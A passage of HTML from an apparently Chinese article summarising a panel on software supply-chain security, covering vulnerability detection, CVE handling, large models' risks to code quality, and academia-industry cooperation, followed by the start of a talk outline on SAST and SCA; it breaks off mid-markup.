&#34;微软雅黑 Light&#34;, sans-serif;color: black;">郑耿：主要是</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">安全左移</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">。例如：编码早期阶段识别风险；CICD自动化设置卡点，静态、动态分析设置卡点，目前误报率高，生产结合有差距；供应链管理，安全能力建设，识别体系环节每个点的安全威胁，根据分析结果做主动的防御措施和能力；安全能力建设，如软硬件结合缓解安全漏洞威胁，如可信执行能力，在更早期建设安全能力，增加攻击成本，降低安全风险。<o:p></o:p></span></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">李晓红：需要尽早防御，减少攻击面，主动识别评估，让攻击不能得逞。例如：对必要的依赖，要有可信的依赖源；依赖要做准入评估；自动化扫描，间接依赖链条也要早期发现；可利用漏洞，要能早预测；</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">未知漏洞要有方法生成自动化测试并优化预测模型</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">。<o:p></o:p></span></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">陈碧欢：</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">内生安全</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">，应对未知漏洞，有漏洞还能正常运行。<o:p></o:p></span></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">彭鑫：需要</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">多种武器组合</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">。例如，安全左移，cicd流程，嵌入工具，静态扫描，等等。@郑耿，工业界有多少种武器？<o:p></o:p></span></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">郑耿：针对不同产品线，有不同研发流程和工具；针对不同语言有编码规范，规范还翻译成扫描规则；也有商业扫描工具，但是假阳率比较高，需要安全工程师结合扫描结果进行人工代码级判断。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">问：已知漏洞，同源漏洞如何发现？<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">郑耿：需要有商业数据库、自采数据库、自己挖掘的漏洞数据库，并将这些不同的数据汇集和清洗，基于这些漏洞库，对代码仓后台匹配扫描。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">彭鑫：</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">被动不可避免</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">，被动正常，已知漏洞到了客户才暴露，如何稍微好一点、避免影响？横向类比，新冠病毒，国家防御体系高度联网，比对发现可以判断是已知的或新的病毒。软件漏洞却没做好，漏洞都是漏洞实例，报的也不准，</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">漏洞实例真正的致病基因其实没多少</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">，可能某一个致病基因就是某一个函数使用不对，同源漏洞、不同的漏洞致病基因是一致的，是否可以类比病毒防御体系，是可以建设国家引导、跨企业商业利益、有广泛共识的病毒库、指纹库、致病基因库。已知的不同语言的致病基因是差不多的，</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">精确刻画漏洞的成因</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">，业务上虽然比较难，但国家可以按照8/2原则做成标准。<o:p></o:p></span></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">陈碧欢：类似哪里冒一个新冠，要能很快感知到。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">彭鑫：有些非技术原因，可能漏洞不报有利。有些厂商对上报漏洞不回复，下一个版本就悄悄修复了。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">郑耿：站在厂商角度，龙蜥是厂商，申报CVE的比较多，主要是固件驱动，其实影响不大，优先级不高。在此呼吁：是否</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">大家报漏洞的时候顺便修一下</span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">{全场大笑}。<o:p></o:p></span></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">陈碧欢：开源社区有隐藏漏洞的约定，例如要求commit不能包括cve信息，做“</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">负责任的漏洞修复</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">”。<o:p></o:p></span></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">陈森：左移好，越早越好；检测、修复都是单点存在，建议</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">检测和修复要动态连接起来。</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">以log4j为例，检测到修复时间跨度很大。全方位的防护离不开动态保障机制，也包括管理。攻击造成后果，理解攻击和恶意包的形式很有帮助，攻击可以总结出模式，可以</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">根据攻击模式改善防御</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">，可以根据28原则总结基础的攻击模式。<o:p></o:p></span></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">张迅晖：技术方面主动防御，开源生态研究，log4j2项目只有2个志愿者维护，也有没人维护的，生态不健康。软件健康度需要有模型进行预警。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">彭鑫：评估很困难，小作坊不一定质量差，例如，汽车的小部件，质量总体可以的。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">提问：CVE难直接对应到组件；是否有通用的排查方法。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">彭鑫：</span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">CVE类似发动群众报信息</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">，鱼龙混杂，更多的是从出问题的单点来报，</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">没有细究背后的根本原因</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">，需要超过单个企业的专业力量，例如国家力量，根据新暴露的漏洞去研究致病基因，例如访问内存模式问题，要有人去做致病基因或模式分析的事情，未来软件是信息化基础设施，出了问题，企业捂住几个漏洞可能还不够，大家有一致的目标，超出商业利益，互通有无，在信息层面抬高拉平，企业在其他场景</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">更高质量水平上竞争</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">。<o:p></o:p></span></span></p><h1 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(30, 78, 121);font-size: 20px;">合议2：大模型对供应链的机遇和挑战？</span><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(30, 78, 121);"><o:p></o:p></span></h1><table cellspacing="0" cellpadding="0" title="" summary=""><tbody><tr style="mso-yfti-irow:0;mso-yfti-firstrow:yes;mso-yfti-lastrow:yes;"><td width="550" valign="top" style="border-width: 1pt;border-style: solid;border-color: rgb(163, 163, 163);padding: 4pt;"><h2 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);font-size: 14px;">合议要点<o:p></o:p></span></h2><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">1. 定义大模型供应链的安全性,包括训练数据、微调、推理等环节的数据安全和伦理安全问题。<o:p></o:p></span></p><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">2. 大模型生成代码便捷,但可能导致开发者对代码细节推敲不足、代码质量下降,以及代码克隆扩散的风险。<o:p></o:p></span></p><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">3. 黑客可能利用大模型生成攻击代码,加大了潜在安全威胁。大模型对代码语义理解存在一定缺陷,在漏洞识别等方面还有局限。<o:p></o:p></span></p><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">4. 需要明确大模型适用于辅助的开发任务边界,找到大模型与传统开发方式的最佳结合点,避免过度依赖。<o:p></o:p></span></p><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">5. 大模型生成代码可能存在许可证和版权问题。利用大模型可能会扩大系统攻击面,需要控制和管理风险。<o:p></o:p></span></p></td></tr></tbody></table><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">郑耿：</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">大模型也有供应链</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">，它的安全怎么定义？因为LLM的训练、微调、推理引入而数据安全、伦理安全等问题，也需要关注。<o:p></o:p></span></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">李晓红：</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">做次科普</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">。LLM使开发者生产代码方便，审查代码也支持；LLM作为强大的知识库，解决了一些问题；供应链管理，LLM对合规性、漏洞依赖性，可以做一些支撑工作；大模型提升了效率，但它在质量安全方面也引入漏洞，有些代码未经审查、存在错误，另外LLM有时效性，要不断更新；对LLM过度依赖也可能会导致创新受限。<o:p></o:p></span></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">彭鑫：围绕软件开发，开发侧的挑战之一是</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">傻瓜式使用大模型的危害</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">，程序员会有依赖心理，人工写代码是决策过程，推敲一件事再往下写，llm一下子生产出来了几十行代码，测试也能通过，但是细节的推敲跳过了，囫囵吞枣照单全收会有问题，例如重复克隆的问题扩大传播。第二，是过于聪明的黑客，可以</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">使用大模型利用漏洞</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">，poc的源代码可能都是现成的；第三，大模型对代码语义的理解强，精确性不理想，漏洞判别涉及语义，LLM有一些效果，是机遇的一方面。<o:p></o:p></span></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">陈森：一个有趣的问题，如果我们问llm，llm刚才生成的代码有没有漏洞，它会怎么回应？{全场欢乐}，大模型不宜直接替代任务，LLM有助于语义理解，但是</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">精确语义理解LLM还有局限</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">，需要找到结合点；安全逻辑问题，LLM不是那么容易理解；大模型供应链的建模也有挑战。<o:p></o:p></span></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">张迅晖：一大挑战是要找准结合的点，利用好LLM的能力，精确的任务LLM表现比较差。智能软件开发，利用chatgpt api，做大模型软件应用市场，是一个机遇。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">陈碧欢：确定哪些事情给大模型做，是比较重要的问题。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">陈森：利用大模型，有可能导致攻击面变大，如何控制是个问题。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">郑耿：大模型的产生的代码，是否有</span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">license问题</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">？它可以生成和开源项目一样的代码。<o:p></o:p></span></span></p><h1 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(30, 78, 121);font-size: 20px;">合议3：高校、企业、厂商如何分工合作、协同发展？</span><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(30, 78, 121);"><o:p></o:p></span></h1><table cellspacing="0" cellpadding="0" title="" summary=""><tbody><tr style="mso-yfti-irow:0;mso-yfti-firstrow:yes;mso-yfti-lastrow:yes;"><td width="550" valign="top" style="border-width: 1pt;border-style: solid;border-color: rgb(163, 163, 163);padding: 4pt;"><h2 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);font-size: 14px;">合议要点<o:p></o:p></span></h2><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">1. 企业内部对项目有不同阶段定位,如早期科研探索、预研验证可行性、业务结合产出落地等,注重最大化产出价值。<o:p></o:p></span></p><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">2. 学校理论创新发挥引领作用,企业关注产品研发落地,两者需要紧密合作、分工协作、共同推进,如共建平台、共享数据等。<o:p></o:p></span></p><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">3. 供应链安全是重要的系统性课题,需要平台企业、安全企业、研发企业、应用企业等多方密切合作。<o:p></o:p></span></p><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">4. 学术界和工业界要加强有效沟通,促进相互了解,共享成果和待解决问题,在特定主题上形成吸引力与合力。<o:p></o:p></span></p><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">5. 可借助开源社区、专业委员会、校企合作赛事等形式,促进学术界和企业界的深度交流与合作。<o:p></o:p></span></p></td></tr></tbody></table><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">郑耿：</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">企业内部对项目有精细合理的定位层级</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">，例如，早期是和科研大所合作，先孵化；之后可以定位为预研，做简单的poc，验证可行性；之后就是和业务结合，成果输出，可执行性和陆续落地；最后是实际落地产出价值的比较完善的项目。<o:p></o:p></span></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">具体模式也很多，主要考虑怎么和生产结合，最大化价值产出的投入。例如，前沿的学术探索，我们和彭老师合作；开源合作也是不错平台，依托开源基金会等形式，在开源社区做合作探索；另外，关于漏洞的本质特征研究，大家都很关注，行业的安全厂商会用它来卖钱，涉及利益，厂商一般不会去开源合作。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">陈碧欢：CCF也发挥了很好的作用，如</span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">CCF供应链安全小组</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">，希望以开源的方式共建平台。<o:p></o:p></span></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">李晓红：学校理论层面创新，方案落地，标准规则制定，</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">学校起到引领作用</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">；企业关心产研落地，高校做完的研究去落地，高校有经费支持，企业提供社会服务。产学合作前提是发展软件供应链有前景，基础数据能够共享，现在cve、nvd是不是很全的，要有人去整理，也有人不愿意分享。大家为了一个共同的目标，去共享。高校很好的项目做完研究，如果没有</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">持续更新的数据去落地</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">，研究也会被阻碍，总的来说，校企要共建、分工。<o:p></o:p></span></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">彭鑫：产学研非常重要，供应链是重要的话题。</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">世界运行依托软件，托付给软件越多，链条越复杂，威胁越大</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">。平台企业，安全企业，研发企业，应用企业，要密集合作。对高校来讲，我们对工业界在实际应用中碰到的问题全貌、什么在企业中更重要，拿捏清楚比较难。站在工业界视角，供应链体系什么都需要，哪怕有些模块比较简单，但是完整的东西要先出来；工业界目标更明确，有上线的压力，需要探索不同的可能性，</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">好用的拿来先用了再说</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">。学术界可能对</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">单点研究比较深</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">，有论文、单点工具，也在做平台，例如伏羲平台里面软件供应链治理覆盖刚起步，大家要加强合作。<o:p></o:p></span></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">AI领域比较好，大家都在这个领域做事，领域进展大家都看得见，马上可以转化为生产力。供应链是个大课题，要把体系梳理清楚，</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">要先区分什么地方是空白要去研究，什么地方已经很成熟不要再去碰</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">，如果有成熟解决方案就不要再重复研究了。供应链看上去人人发文章，每人都在取得突破，都超过前人，但谁也不知道成果效果怎么样，心里没底，业界也不知道学术界的成果能帮助我到什么程度。<o:p></o:p></span></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">陈碧欢：每个sca都有专有的benchmark，都说自己好，如果有联盟就挺好的。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">彭鑫：联盟挺好的，把各自</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">开源的微服务变成演练和验证的基础</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">，实践验证，大家一起建设公认的尺子，大家都自然而然承认成熟到什么程度了，避免各说各话。<o:p></o:p></span></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">陈森：学术界和工业界要加强有效沟通，目前机制没有健全。学术界参与社区，但没有很强的动机去参与，学术和工业两个领域相互了解动机也不强。只有工业界和学术界加强沟通，在一个平台上相互了解彼此，共享成果和待解决的问题，</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">学术界渴望了解工业界的软件供应链做到什么程度了，有哪些痛点</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">，目前还缺乏合适的条件和机会。<o:p></o:p></span></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">陈碧欢：CCF有组织类似软件供应链走进高校、厂商的活动。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">陈森：</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">要定义清晰的主题</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">，吸引大家一起来搞一搞，高校行是否可以就一个领域，明确一个主题，例如SCA分析到什么程度了，大家就有很强的动力去专注参加。<o:p></o:p></span></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">彭鑫：学术界其实非常开放，高校最没有利益诉求，最想把问题梳理清楚，把卡点问题解决，问题特别吸引学术界的人。工业界不是特别透明，例如，有时候也请大厂来分享，但是分析的深度有限，因为工业界限制会比较多，感觉很体系化、什么问题都解决了，但是</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">高级别的痛点是需要继续开放讨论的</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">。<o:p></o:p></span></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">郑耿：有个例子，工业界成立容器安全联盟，就是希望建立机制，最大化的安全厂商的主观能动性，<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">张迅晖：我们组织开源校园大赛，组织企业把关心的问题发布到平台，学生接收、解决真问题。这样可以帮企业解决关心的、真正需要解决东西，也可以帮学生找工作、进行适配。另外，我们还有国产os专区、大家都可以去分享、互动某一个领域的进展。<o:p></o:p></span></p><h1 style="margin:0cm;"><span style="font-size: 20px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(20, 50, 77);">主题1：软件供应链代码安全</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(20, 50, 77);">检测与验证关键技术
陈森 天津大学</span></span><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p></o:p></span></h1><table cellspacing="0" cellpadding="0" title="" summary=""><tbody><tr style="mso-yfti-irow:0;mso-yfti-firstrow:yes;mso-yfti-lastrow:yes;"><td width="549" valign="top" style="border-width: 1pt;border-style: solid;border-color: rgb(163, 163, 163);padding: 4pt;"><h2 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);font-size: 14px;">主题要点<o:p></o:p></span></h2><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">1. 构建自主的代码安全防护架构,包括底层自主静态分析框架,上层搭建自主供应链安全分析平台,覆盖SAST、SCA、PoC等技术。<o:p></o:p></span></p><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">2. 静态分析SAST面临漏报高、误报高等挑战;恶意代码检测则需剖析恶意行为语义。产学研合作有助于获取高质量数据集。<o:p></o:p></span></p><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">3. SCA代码相似性比对即克隆检测是一个难点,需准确定义特征,结合语义信息;漏洞可达性分析和脆弱函数识别也具有挑战性。<o:p></o:p></span></p><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">4. 需解决数据质量问题,如补全CVE描述、提交commit信息等,可借助大模型等AI技术进行数据增强。<o:p></o:p></span></p><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">5. 报告的漏洞需动态验证判断是否需要修复;恶意代码行为剖析需语义建模;POC生成及漏洞触发自动化也有待突破。<o:p></o:p></span></p></td></tr></tbody></table><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">开源软件是软件供应链发展重要推手，提升软件供应链自主权和安全性成为国家战略，也面临卡脖子风险，需要检测与验证开源和闭源代码的漏洞和恶意代码。<o:p></o:p></span></p><h2 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);font-size: 14px;">自主的代码安全架构设计<o:p></o:p></span></h2><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">底层推出自主的动静态分析框架，支撑代码安全的相关研究，上层基于SAST/SCA/PoC，搭建自主供应链安全分析平台，进行代码安全的检测和验证。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p><img class="rich_pages wxw-img" data-imgfileid="100000320" data-ratio="0.7673611111111112" data-type="png" data-w="864" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=2b1df72f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUTc3S6D5727J7cicTqZBaBk1ibyHlRhs9FLicESkhd8mLxnVPr895iaymNQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></o:p></span></p><h2 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);font-size: 14px;">代码安全关键技术研究聚焦安全左移<o:p></o:p></span></h2><h3 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(91, 155, 213);font-size: 14px;">问题：漏洞检测漏报率高、误报率高<o:p></o:p></span></h3><h3 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(91, 155, 213);font-size: 14px;">问题：恶意代码检测的恶意行为剖析难<o:p></o:p></span></h3><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p><img class="rich_pages wxw-img" data-imgfileid="100000321" data-ratio="0.7673611111111112" data-type="png" data-w="864" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=2b1df72f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUTc3S6D5727J7cicTqZBaBk1ibyHlRhs9FLicESkhd8mLxnVPr895iaymNQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></o:p></span></p><h2 style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(46, 117, 181);">静态应用安全测试SAST<o:p></o:p></span></h2><h3 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);font-size: 14px;">问题：大数据集和训练<o:p></o:p></span></h3><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">产学研合作有契机，学术界开放的数据集不大；企业界的数据量大，案例鲜活。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 